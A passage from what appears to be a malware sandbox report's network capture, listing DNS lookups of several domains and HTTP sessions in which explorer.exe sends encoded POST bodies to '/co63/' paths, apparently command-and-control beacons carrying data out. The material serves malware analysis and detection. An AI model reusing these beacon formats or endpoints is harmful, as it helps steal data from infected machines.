                                                      Jul 20, 2023 11:46:59.801222086 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.802037954 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.802067041 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.802090883 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.802104950 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.802130938 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.802140951 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.802162886 CEST804973223.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:46:59.802172899 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:46:59.802195072 CEST4973280192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:47:00.118531942 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118568897 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118597031 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118621111 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118647099 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118666887 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:47:00.118670940 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118699074 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118716955 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:47:00.118721008 CEST804973323.227.38.74192.168.2.5
                                                      Jul 20, 2023 11:47:00.118731976 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:47:00.118753910 CEST4973380192.168.2.523.227.38.74
                                                      Jul 20, 2023 11:47:00.122561932 CEST4973380192.168.2.523.227.38.74

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jul 20, 2023 11:44:35.818205118 CEST6084153192.168.2.58.8.8.8
                                                      Jul 20, 2023 11:44:35.879318953 CEST53608418.8.8.8192.168.2.5
                                                      Jul 20, 2023 11:44:50.552478075 CEST6189353192.168.2.58.8.8.8
                                                      Jul 20, 2023 11:44:50.588876009 CEST53618938.8.8.8192.168.2.5
                                                      Jul 20, 2023 11:45:11.235212088 CEST6064953192.168.2.58.8.8.8
                                                      Jul 20, 2023 11:45:33.849143028 CEST5144153192.168.2.58.8.8.8
                                                      Jul 20, 2023 11:45:33.890857935 CEST53514418.8.8.8192.168.2.5
                                                      Jul 20, 2023 11:45:54.516891956 CEST4917753192.168.2.58.8.8.8
                                                      Jul 20, 2023 11:45:54.714396000 CEST53491778.8.8.8192.168.2.5
                                                      Jul 20, 2023 11:46:15.094552040 CEST4972453192.168.2.58.8.8.8
                                                      Jul 20, 2023 11:46:15.173907995 CEST53497248.8.8.8192.168.2.5
                                                      Jul 20, 2023 11:46:39.587030888 CEST6145253192.168.2.58.8.8.8
                                                      Jul 20, 2023 11:46:39.627633095 CEST53614528.8.8.8192.168.2.5
                                                      Jul 20, 2023 11:46:57.250439882 CEST6532353192.168.2.58.8.8.8
                                                      Jul 20, 2023 11:46:57.310929060 CEST53653238.8.8.8192.168.2.5

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jul 20, 2023 11:44:35.818205118 CEST192.168.2.58.8.8.80x365aStandard query (0)www.vestostore.comA (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:44:50.552478075 CEST192.168.2.58.8.8.80xc6abStandard query (0)www.saleschildcarriers.comA (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:45:11.235212088 CEST192.168.2.58.8.8.80x2bf2Standard query (0)www.ballthingsez.comA (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:45:33.849143028 CEST192.168.2.58.8.8.80x9184Standard query (0)www.dlafluid.comA (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:45:54.516891956 CEST192.168.2.58.8.8.80xeebaStandard query (0)www.myccsmartmove.comA (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:46:15.094552040 CEST192.168.2.58.8.8.80x3fe3Standard query (0)www.takealicense.comA (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:46:39.587030888 CEST192.168.2.58.8.8.80x310bStandard query (0)www.naspewt.xyzA (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:46:57.250439882 CEST192.168.2.58.8.8.80x1688Standard query (0)www.mattewigs.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jul 20, 2023 11:44:35.879318953 CEST8.8.8.8192.168.2.50x365aNo error (0)www.vestostore.comvestostore.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 20, 2023 11:44:35.879318953 CEST8.8.8.8192.168.2.50x365aNo error (0)vestostore.com86.38.202.187A (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:44:50.588876009 CEST8.8.8.8192.168.2.50xc6abNo error (0)www.saleschildcarriers.com172.67.215.254A (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:44:50.588876009 CEST8.8.8.8192.168.2.50xc6abNo error (0)www.saleschildcarriers.com104.21.75.67A (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:45:11.283035040 CEST8.8.8.8192.168.2.50x2bf2No error (0)www.ballthingsez.com4zmf1gx83y.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                      Jul 20, 2023 11:45:11.283035040 CEST8.8.8.8192.168.2.50x2bf2No error (0)scdn2de06.wpc.9972b.lambdacdn.netsni1gl.wpc.lambdacdn.netCNAME (Canonical name)IN (0x0001)false
                                                      Jul 20, 2023 11:45:11.283035040 CEST8.8.8.8192.168.2.50x2bf2No error (0)sni1gl.wpc.lambdacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:45:33.890857935 CEST8.8.8.8192.168.2.50x9184No error (0)www.dlafluid.comdlafluid.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 20, 2023 11:45:33.890857935 CEST8.8.8.8192.168.2.50x9184No error (0)dlafluid.com34.102.136.180A (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:45:54.714396000 CEST8.8.8.8192.168.2.50xeebaNo error (0)www.myccsmartmove.com342284.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                      Jul 20, 2023 11:45:54.714396000 CEST8.8.8.8192.168.2.50xeebaNo error (0)342284.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:45:54.714396000 CEST8.8.8.8192.168.2.50xeebaNo error (0)342284.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:46:15.173907995 CEST8.8.8.8192.168.2.50x3fe3No error (0)www.takealicense.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                      Jul 20, 2023 11:46:15.173907995 CEST8.8.8.8192.168.2.50x3fe3No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                      Jul 20, 2023 11:46:15.173907995 CEST8.8.8.8192.168.2.50x3fe3No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:46:39.627633095 CEST8.8.8.8192.168.2.50x310bNo error (0)www.naspewt.xyz184.94.215.140A (IP address)IN (0x0001)false
                                                      Jul 20, 2023 11:46:57.310929060 CEST8.8.8.8192.168.2.50x1688No error (0)www.mattewigs.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 20, 2023 11:46:57.310929060 CEST8.8.8.8192.168.2.50x1688No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.vestostore.com
                                                      • www.saleschildcarriers.com
                                                      • www.ballthingsez.com
                                                      • www.dlafluid.com
                                                      • www.myccsmartmove.com
                                                      • www.takealicense.com
                                                      • www.naspewt.xyz
                                                      • www.mattewigs.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.54971186.38.202.18780C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:44:37.828722954 CEST121OUTGET /co63/?aJElwV=+eMjGIULdB7b+FjbEEC2CFnAZBB7ZIs3DDH5LmXZiTUQNAaNvk9FU6ysQ2HcgTeGr7Jo&lz=9rXXjDMXIb6HXH- HTTP/1.1
                                                      Host: www.vestostore.com
                                                      Connection: close
                                                      Data Raw: 00 00 00 00 00 00 00
                                                      Data Ascii:
                                                      Jul 20, 2023 11:44:37.992095947 CEST122INHTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      content-type: text/html
                                                      content-length: 707
                                                      date: Thu, 20 Jul 2023 09:44:37 GMT
                                                      server: LiteSpeed
                                                      location: https://www.vestostore.com/co63/?aJElwV=+eMjGIULdB7b+FjbEEC2CFnAZBB7ZIs3DDH5LmXZiTUQNAaNvk9FU6ysQ2HcgTeGr7Jo&lz=9rXXjDMXIb6HXH-
                                                      platform: hostinger
                                                      content-security-policy: upgrade-insecure-requests
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      1192.168.2.54971286.38.202.18780C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:44:40.282881975 CEST124OUTPOST /co63/ HTTP/1.1
                                                      Host: www.vestostore.com
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.vestostore.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.vestostore.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 32 38 41 5a 59 73 77 35 63 54 4c 46 6c 6c 7e 72 63 52 6a 69 53 52 72 50 52 52 64 4c 4f 4b 68 33 59 31 47 67 56 6d 7a 76 79 42 34 68 63 52 69 68 6d 56 30 6d 52 74 37 30 47 41 76 6d 76 78 75 31 7a 38 59 68 77 37 42 48 6f 36 4e 4d 71 71 6a 34 71 35 50 61 53 73 72 71 76 5a 71 63 62 68 54 39 34 6b 59 70 6f 4c 28 6c 35 7a 4b 46 33 35 63 6f 52 61 41 44 30 46 35 75 4c 4a 66 71 28 6c 48 53 63 54 56 70 36 74 69 56 6d 43 54 33 67 38 33 54 35 36 58 6b 64 38 62 50 57 70 78 72 66 59 76 5a 6c 61 74 67 4c 66 32 50 41 4f 38 39 63 67 32 51 4a 63 4c 5a 57 57 72 2d 59 6f 28 41 6a 78 4d 70 75 79 65 50 6e 41 5a 4c 63 46 54 49 45 6f 4d 32 28 68 77 37 6b 69 69 6b 49 6d 71 79 53 75 4a 35 79 30 71 46 37 4d 6d 6b 7a 62 4c 55 65 6f 70 46 68 79 6b 7a 28 34 66 7a 6c 4b 51 30 35 55 4e 39 61 69 79 64 5a 4d 68 48 30 4e 68 5a 45 6d 56 34 31 5a 61 70 71 42 5a 6c 47 69 67 4e 78 52 69 6d 30 71 78 7a 42 57 74 57 41 52 73 48 74 38 75 73 6d 30 52 33 68 58 53 57 75 42 6f 5a 70 50 61 72 6b 4c 77 75 55 54 6a 6d 6f 47 59 77 4d 72 75 50 35 4a 33 35 4e 71 68 47 7e 31 32 62 58 6d 46 6f 35 56 52 54 65 37 67 43 59 69 70 66 53 63 33 35 37 54 6c 7a 42 34 35 55 58 2d 4f 4d 7a 6a 33 49 28 63 62 55 61 72 55 77 76 73 66 72 41 62 33 79 73 79 34 72 77 2d 70 61 37 72 6b 5a 71 63 62 42 4e 4d 45 32 6b 71 73 6e 55 66 6f 74 6a 69 64 39 50 43 67 6f 45 30 38 5a 36 79 4b 6e 45 6d 76 4a 62 5f 6c 59 46 68 57 53 4d 6c 48 45 6f 34 79 2d 28 51 6d 59 43 4b 4d 4a 45 32 4c 46 5a 77 65 63 4e 6f 6a 76 33 43 43 70 68 54 38 79 4c 59 56 57 67 70 49 55 54 4b 32 53 33 34 69 37 6f 48 50 6f 42 34 73 4a 46 58 76 4c 51 6f 34 63 41 5a 76 77 6c 63 44 48 64 67 36 62 43 59 51 44 67 37 6d 6f 6e 66 33 54 46 6e 79 56 7a 56 28 79 38 7a 59 79 6a 73 6d 77 6b 7a 32 5a 72 56 34 49 30 39 79 4b 69 53 5a 68 62 74 43 57 61 48 43 36 61 50 5a 77 54 6d 70 51 42 75 37 58 66 74 28 39 55 31 4f 68 73 71 70 5a 67 7a 5a 43 50 4a 33 39 42 36 34 4d 43 6d 69 58 62 38 69 64 53 31 64 67 36 68 64 79 42 30 6f 32 7e 6e 5a 5f 56 47 64 74 50 37 57 62 33 69 67 47 34 50 38 53 59 6d 34 53 47 46 32 42 35 4c 47 58 65 6b 49 58 78 41 37 37 5a 63 30 42 71 50 31 58 6f 66 34 63 36 33 70 4e 68 59 43 76 38 62 34 62 36 61 6b 58 67 2d 51 6a 74 31 6b 55 4b 73 58 74 75 36 51 45 65 61 36 6f 79 6f 46 47 66 6a 28 45 47 56 68 6a 4a 74 32 46 31 69 41 6e 47 39 6b 73 69 35 33 7a 69 43 37 4b 61 48 7a 47 7a 69 78 54 62 38 42 4f 6b 53 32 76 74 30 4e 34 46 71 6a 36 78 65 51 49 61 4c 4d 6a 4e 33 57 36 51 43 6c 4f 6c 56 44 47 68 62 39 49 69 4f 4a 4e 59 32 49 76 6e 6d 34 78 28 72 44 38 35 45 70 42 56 77 4f 46 78 4a 4b 6b 6d 6a 39 35 68 7a 4a 64 4a 69 56 51 32 79 5a 62 59 4a 77 34 42 7a 62 79 4a 6b 4e 39 53 31 4f 43 37 31 70 32 52 33 63 69 4b 69 63 71 56 61 41 59 45 47 4c 78 71 42 61 72 7a 48 69 70 51 74 42 72 4e 59 67 79 5a 4e 4e 47 46 59 28 34 6d 42 41 37 77 41 4f 7a 7a 30 68 69 54 54 74 37 68 66 28 4b 78 77 6f 52 72 31 63 63 72 59 66 77 36 63 78 4b 32 31 68 6e 6c 6e 6b 68 43 41 52 6b 56 6b 45 5f 52 38 34 44 55 69 44 43 43 47 48 74 41 45 6e 75 34 4a 45 41 6d 64 7a 57 73 61 28 32 6a 47 39 5a 4d 47 53 2d 72 70 43 36 75 36 4c 59 61 48 62 36 73 58 73 59 66 6c 39 70 32 46 6d 4a 76 6b 51 73 56 53 52 73 37 46 43 77 6a 36 37 56 6b 4d 33 54 6d 6e 32 6b 33 37 64 70 52 6a 37 31 73 58 6b 55 49 31 37 6b 67 71 63 71 34 2d 71 6a 59 72 52 42 6a 43 6f 4b 66 6e 6a 38 70 32 73 51 31 76 32 5f 49 62 41 51 56 5f 77 6a 4b 61 36 4c 55 4c 77 6c 6a 30 37 79 69 7a 5a 76 46 73 70 33 74 33 61 4c 55 36 7e 35 7a 4a 69 57 61 72 67 6c 45 68 6b 67 57 41 55 72 70 77 5a 61 75 34 79 7a 58 73 46 4b 43 6b 61 67 6d 61 66 6b 31 2d 7e 4e 52 67 56 69 62 32 37 37 71 56 71 44 7e 79 54 74 33 70 48 53 4e 64 65 6f 55 69 72 4e 73 44 67 35 64 6c 57 66 64 45 66 54 77 33 37 33 41 50 65 5a 73 66 56 48 4c 73 76 41 46 6e 37 63 6d 5a 79 37 36 70 4e 67 55 69 44 78 4c 58 55 52 4e 44 54 4e 7a 5a 53 38 50 66 52 4e 44 65 77 71 54 43 5a 48 67 64 45 74 6e 50 67 42 76 35 4e 50 35 70 6c 37 41 6d 43 73 68 51 5a 31 58 65 4b 36 67 33 77 44 69 6e 49 43 42 61 7e 75 74 43 74 76 61 51 59 63 34 79 61 58 63 52 47 62 47 4e 58 2d 67 73 4b 75 45 54 4d 73 33 51 4c 51 46 50 6b 61 6d 56 64 68 73 59 32 53 4b 30 78 37
                                                      Data Ascii: aJElwV=28AZYsw5cTLFll~rcRjiSRrPRRdLOKh3Y1GgVmzvyB4hcRihmV0mRt70GAvmvxu1z8Yhw7BHo6NMqqj4q5PaSsrqvZqcbhT94kYpoL(l5zKF35coRaAD0F5uLJfq(lHScTVp6tiVmCT3g83T56Xkd8bPWpxrfYvZlatgLf2PAO89cg2QJcLZWWr-Yo(AjxMpuyePnAZLcFTIEoM2(hw7kiikImqySuJ5y0qF7MmkzbLUeopFhykz(4fzlKQ05UN9aiydZMhH0NhZEmV41ZapqBZlGigNxRim0qxzBWtWARsHt8usm0R3hXSWuBoZpParkLwuUTjmoGYwMruP5J35NqhG~12bXmFo5VRTe7gCYipfSc357TlzB45UX-OMzj3I(cbUarUwvsfrAb3ysy4rw-pa7rkZqcbBNME2kqsnUfotjid9PCgoE08Z6yKnEmvJb_lYFhWSMlHEo4y-(QmYCKMJE2LFZwecNojv3CCphT8yLYVWgpIUTK2S34i7oHPoB4sJFXvLQo4cAZvwlcDHdg6bCYQDg7monf3TFnyVzV(y8zYyjsmwkz2ZrV4I09yKiSZhbtCWaHC6aPZwTmpQBu7Xft(9U1OhsqpZgzZCPJ39B64MCmiXb8idS1dg6hdyB0o2~nZ_VGdtP7Wb3igG4P8SYm4SGF2B5LGXekIXxA77Zc0BqP1Xof4c63pNhYCv8b4b6akXg-Qjt1kUKsXtu6QEea6oyoFGfj(EGVhjJt2F1iAnG9ksi53ziC7KaHzGzixTb8BOkS2vt0N4Fqj6xeQIaLMjN3W6QClOlVDGhb9IiOJNY2Ivnm4x(rD85EpBVwOFxJKkmj95hzJdJiVQ2yZbYJw4BzbyJkN9S1OC71p2R3ciKicqVaAYEGLxqBarzHipQtBrNYgyZNNGFY(4mBA7wAOzz0hiTTt7hf(KxwoRr1ccrYfw6cxK21hnlnkhCARkVkE_R84DUiDCCGHtAEnu4JEAmdzWsa(2jG9ZMGS-rpC6u6LYaHb6sXsYfl9p2FmJvkQsVSRs7FCwj67VkM3Tmn2k37dpRj71sXkUI17kgqcq4-qjYrRBjCoKfnj8p2sQ1v2_IbAQV_wjKa6LULwlj07yizZvFsp3t3aLU6~5zJiWarglEhkgWAUrpwZau4yzXsFKCkagmafk1-~NRgVib277qVqD~yTt3pHSNdeoUirNsDg5dlWfdEfTw373APeZsfVHLsvAFn7cmZy76pNgUiDxLXURNDTNzZS8PfRNDewqTCZHgdEtnPgBv5NP5pl7AmCshQZ1XeK6g3wDinICBa~utCtvaQYc4yaXcRGbGNX-gsKuETMs3QLQFPkamVdhsY2SK0x7Ouhh0hq1aLLF2jcex70Hucims2Cj7p1j3tTwxC5hQvXhsokdEYU-XMeBAa1cVBpO29pUhKYVEINk(rRx04Ndc5komp8LTPIi0yBq9egzCXJNDu(OSwBXqQ).
                                                      Jul 20, 2023 11:44:40.445296049 CEST125INHTTP/1.1 301 Moved Permanently
                                                      Connection: close
                                                      content-type: text/html
                                                      content-length: 707
                                                      date: Thu, 20 Jul 2023 09:44:40 GMT
                                                      server: LiteSpeed
                                                      location: https://www.vestostore.com/co63/
                                                      platform: hostinger
                                                      content-security-policy: upgrade-insecure-requests
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      10192.168.2.54972134.102.136.18080C:\Windows\explorer.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jul 20, 2023 11:45:36.345082998 CEST485OUTPOST /co63/ HTTP/1.1
                                                      Host: www.dlafluid.com
                                                      Connection: close
                                                      Content-Length: 1484
                                                      Cache-Control: no-cache
                                                      Origin: http://www.dlafluid.com
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://www.dlafluid.com/co63/
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate
                                                      Data Raw: 61 4a 45 6c 77 56 3d 7a 65 30 43 77 70 4b 68 72 43 6e 49 4c 66 6d 30 6b 42 57 57 6f 46 4b 47 38 6a 56 5a 57 4b 57 72 7a 6f 36 72 75 79 75 54 37 32 53 41 49 42 50 50 42 64 79 74 79 4b 74 2d 55 46 79 6c 48 59 77 64 44 48 76 33 54 75 52 45 4f 4d 69 6d 43 44 36 54 4f 52 78 56 39 7a 77 61 76 37 72 44 33 36 31 42 56 53 51 50 67 73 4a 63 59 4a 77 49 38 54 43 41 61 47 70 44 54 6b 6d 42 38 64 34 58 63 68 75 48 4f 6b 63 59 4b 61 48 64 65 6e 74 32 74 5a 34 7a 55 54 6b 4d 33 6c 47 37 56 44 33 37 68 69 28 52 41 47 6c 6f 43 35 62 51 62 66 49 56 71 47 44 64 64 6b 69 44 4d 6c 48 5a 5a 4a 58 42 71 4b 39 64 36 6b 55 4a 39 61 79 4f 4c 48 7a 37 70 79 75 6e 71 30 4a 76 36 39 63 37 46 30 75 37 28 48 64 6b 55 4a 65 6b 31 4e 30 47 68 50 5a 30 45 48 4d 68 66 57 28 6b 4f 33 46 61 7e 78 34 5f 32 75 39 4e 54 57 52 73 37 52 65 4f 4b 4c 4b 6d 57 5f 41 5f 38 44 30 47 47 61 64 46 6e 67 54 62 70 5f 68 44 28 49 55 46 44 4f 73 59 69 45 59 79 6e 75 54 5f 32 71 34 75 58 6d 45 68 46 50 57 4f 46 70 7a 38 36 52 47 74 31 7a 4b 44 62 44 4b 79 49 42 63 51 4f 35 47 77 6c 63 76 4b 6b 63 61 65 4f 71 4f 44 53 37 6c 55 37 5a 59 30 44 69 62 37 73 61 79 33 74 6b 6f 35 47 5a 4e 59 51 7a 54 43 77 35 70 6a 50 5f 65 78 41 75 74 41 57 6b 37 57 6e 48 70 